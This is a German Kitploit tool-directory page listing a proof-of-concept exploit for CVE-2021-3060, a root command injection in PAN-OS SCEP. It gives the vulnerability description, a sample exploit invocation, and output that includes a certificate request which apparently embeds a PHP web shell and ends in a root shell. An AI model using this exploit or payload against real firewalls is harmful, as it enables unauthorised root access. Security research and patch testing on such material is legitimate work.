Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-3060 — CVE-2021-3060 | Kitploit
Tools/GitHubGitHub/anmolksachan/cve-2021-3060
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubanmolksachan/cve-2021-3060

CVE-2021-3060

CVE-2021-3060

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2021-3060 POC/ Exploit

Beschreibung:

Eine OS-Befehlsinjektionsschwachstelle im Simple Certificate Enrollment Protocol (SCEP)-Feature der PAN-OS-Software ermöglicht es einem nicht authentifizierten, netzwerkbasierten Angreifer mit spezifischen Kenntnissen der Firewall-Konfiguration, beliebigen Code mit Root-Benutzerrechten auszuführen. Der Angreifer muss über Netzwerkzugriff auf die GlobalProtect-Schnittstellen verfügen, um dieses Problem auszunutzen. Dieses Problem betrifft: PAN-OS 8.1-Versionen vor PAN-OS 8.1.20-h1; PAN-OS 9.0-Versionen vor PAN-OS 9.0.14-h3; PAN-OS 9.1-Versionen vor PAN-OS 9.1.11-h2; PAN-OS 10.0-Versionen vor PAN-OS 10.0.8; PAN-OS 10.1-Versionen vor PAN-OS 10.1.3. Prisma Access-Kunden mit Prisma Access 2.1 Preferred- und Prisma Access 2.1 Innovation-Firewalls sind von diesem Problem betroffen.

Schwachstellen:

CWE-78

Link:

https://nvd.nist.gov/vuln/detail/CVE-2021-3060

Beispielausgabe:

root@kitploit:~
$ python3 cve-2021-3060.py http://panw.local test-scep-profile
Certificate Request:
    Data:
        Version: 0 (0x0)
        Subject: serialNumber=test, CN=uid=99(nobody) gid=99(nobody) groups=99(nobody)
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (512 bit)
                Modulus:
                    00:be:e2:cc:14:7e:94:ef:5d:59:1c:3b:17:92:c0:
                    34:ce:10:67:c7:c4:26:24:f1:52:b4:65:c7:a6:68:
                    c4:2b:ef:99:7c:f8:53:c3:ad:0b:f0:d0:8e:f2:62:
                    94:52:4c:1b:bb:c9:47:63:35:1b:f3:f6:fe:1b:f4:
                    d9:45:44:64:93
                Exponent: 65537 (0x10001)
        Attributes:
            challengePassword        :challenge
    Signature Algorithm: sha256WithRSAEncryption
         a9:c1:56:6d:86:4f:3e:d6:5a:99:33:37:f6:40:a6:7d:19:0c:
         63:3d:a2:bd:d1:45:e9:f2:50:b3:3c:65:fc:a7:9b:3e:81:64:
         d1:96:99:d6:f4:9b:a2:ed:3c:5d:da:ec:bb:69:55:e0:fc:59:
         53:30:3f:a7:ed:d6:71:da:a6:7e
-----BEGIN CERTIFICATE REQUEST-----
MIIBCTCBtAIBADA1MQ0wCwYDVQQFEwR0ZXN0MSQwIgYDVQQDFBs8P3BocCBwYXNz
dGhydSgkX0dFVFswXSk7Pz4wXDANBgkqhkiG9w0BAQEFAANLADBIAkEAvuLMFH6U
711ZHDsXksA0zhBnx8QmJPFStGXHpmjEK++ZfPhTw60L8NCO8mKUUkwbu8lHYzUb
8/b+G/TZRURkkwIDAQABoBowGAYJKoZIhvcNAQkHMQsTCWNoYWxsZW5nZTANBgkq
hkiG9w0BAQsFAANBAKnBVm2GTz7WWpkzN/ZApn0ZDGM9or3RRenyULM8Zfynmz6B
ZNGWmdb0m6LtPF3a7LtpVeD8WVMwP6ft1nHapn4=
-----END CERTIFICATE REQUEST-----

uid=0(root) gid=0(root) groups=0(root)

Hinweis: Das Skript ist eine aktualisierte Version, die von https://gist.github.com/rqu1/8ed4f51fd90dd82fc89111340e26a756 übernommen wurde, und nutzt python3.

Tool herunterladen